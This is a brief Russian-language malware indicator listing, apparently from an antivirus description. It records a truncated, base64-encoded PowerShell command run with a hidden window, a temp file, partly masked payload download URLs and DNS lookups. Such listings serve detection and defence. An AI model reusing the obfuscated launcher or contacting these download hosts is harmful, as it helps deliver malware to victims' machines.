Техническая информация
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -ENCOD cwBFAHQALQBWAEEAUgBJAEEAYgBMAEUAIABXAEsAMQAgACgAWwBUAFkAcABFAF0AKAAiAHsAMQB9AHsANQB9AHsAMgB9AHsANAB9AHsAMAB9AHsAMwB9ACIALQBmACAAJwBJAFIARQAnACwAJwBTAHkAUwBUACcALAAnAC4AaQ...
- %TEMP%\1070400.cvr
- http://cu###m.robi2.hu/r0779g.zip
- http://b1#.#obi2.hu/bznqxuny1.zip
- http://ma####chankhong.tv/ug6utpv39
- DNS ASK cu###m.robi2.hu
- DNS ASK ci##s.in
- DNS ASK b1#.#obi2.hu
- DNS ASK pu####.#ltosaxplayer.com
- DNS ASK ma####chankhong.tv
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -ENCOD cwBFAHQALQBWAEEAUgBJAEEAYgBMAEUAIABXAEsAMQAgACgAWwBUAFkAcABFAF0AKAAiAHsAMQB9AHsANQB9AHsAMgB9AHsANAB9AHsAMAB9AHsAMwB9ACIALQBmACAAJwBJAFIARQAnACwAJwBTAHkAUwBUACcALAAnAC4AaQ...' (со скрытым окном)